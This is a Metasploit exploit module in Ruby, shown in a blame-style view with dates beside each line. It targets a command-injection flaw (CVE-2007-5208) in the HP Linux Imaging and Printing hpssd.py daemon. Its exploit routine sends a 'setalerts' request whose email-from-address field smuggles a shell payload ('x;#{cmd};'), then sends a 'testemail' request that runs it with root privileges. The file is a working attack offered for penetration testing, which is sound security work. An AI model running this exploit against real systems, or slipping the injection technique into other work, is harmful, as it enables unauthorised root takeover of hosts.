2010-02-15 22:38:50 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2010-02-15 22:38:50 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
2010-10-09 06:55:52 +00:00
|
|
|
include Msf::Exploit::Remote::Tcp
|
2010-02-15 22:38:50 +00:00
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
2012-03-15 21:37:34 +00:00
|
|
|
'Name' => 'HPLIP hpssd.py From Address Arbitrary Command Execution',
|
2010-02-15 22:38:50 +00:00
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a command execution vulnerable in the hpssd.py
|
2010-02-15 22:42:16 +00:00
|
|
|
daemon of the Hewlett-Packard Linux Imaging and Printing Project.
|
2010-02-15 22:38:50 +00:00
|
|
|
According to MITRE, versions 1.x and 2.x before 2.7.10 are vulnerable.
|
|
|
|
|
2010-02-15 22:42:16 +00:00
|
|
|
This module was written and tested using the Fedora 6 Linux distribution.
|
2010-02-15 22:38:50 +00:00
|
|
|
On the test system, the daemon listens on localhost only and runs with
|
2010-02-15 22:42:16 +00:00
|
|
|
root privileges. Although the configuration shows the daemon is to
|
2010-02-15 22:38:50 +00:00
|
|
|
listen on port 2207, it actually listens on a dynamic port.
|
|
|
|
|
|
|
|
NOTE: If the target system does not have a 'sendmail' command installed,
|
|
|
|
this vulnerability cannot be exploited.
|
|
|
|
},
|
|
|
|
'Author' => [ 'jduck' ],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2007-5208' ],
|
|
|
|
[ 'OSVDB', '41693' ],
|
|
|
|
[ 'BID', '26054' ],
|
|
|
|
[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=319921' ],
|
|
|
|
[ 'URL', 'https://bugzilla.redhat.com/attachment.cgi?id=217201&action=edit' ]
|
|
|
|
],
|
|
|
|
'Platform' => ['unix'],
|
|
|
|
'Arch' => ARCH_CMD,
|
|
|
|
'Privileged' => true,
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 1024,
|
|
|
|
'DisableNops' => true,
|
|
|
|
'Compat' =>
|
|
|
|
{
|
|
|
|
'PayloadType' => 'cmd',
|
2010-02-16 00:27:45 +00:00
|
|
|
# *_perl and *_ruby work if they are installed
|
|
|
|
# inetd isn't used on FC6/7 (xinetd is)
|
|
|
|
# netcat doesn't have -e by default
|
2010-02-15 22:38:50 +00:00
|
|
|
}
|
|
|
|
},
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Automatic (hplip-1.6.7-4.i386.rpm)', { } ]
|
|
|
|
],
|
2010-07-03 03:13:45 +00:00
|
|
|
'DefaultTarget' => 0,
|
|
|
|
'DisclosureDate' => 'Oct 04 2007'
|
|
|
|
))
|
2010-02-15 22:38:50 +00:00
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(2207),
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
|
|
|
|
connect
|
|
|
|
|
2010-02-16 00:27:45 +00:00
|
|
|
#cmd = "nohup " + payload.encoded
|
|
|
|
cmd = payload.encoded
|
2010-02-15 22:38:50 +00:00
|
|
|
|
|
|
|
username = 'root'
|
|
|
|
toaddr = 'nosuchuser'
|
|
|
|
|
|
|
|
# first setalerts
|
|
|
|
print_status("Sending 'setalerts' request with encoded command line...")
|
|
|
|
msg = "username=#{username}\n" +
|
|
|
|
"email-alerts=1\n" +
|
2010-02-16 00:27:45 +00:00
|
|
|
#"email-from-address=`#{cmd}`\n" +
|
|
|
|
"email-from-address=x;#{cmd};\n" +
|
2010-02-15 22:38:50 +00:00
|
|
|
"email-to-addresses=#{toaddr}\n" +
|
|
|
|
"msg=setalerts\n"
|
|
|
|
sock.put(msg)
|
|
|
|
|
|
|
|
# next, the test email command
|
|
|
|
print_status("Sending 'testemail' request to trigger execution...")
|
|
|
|
msg = "msg=testemail\n"
|
|
|
|
sock.put(msg)
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|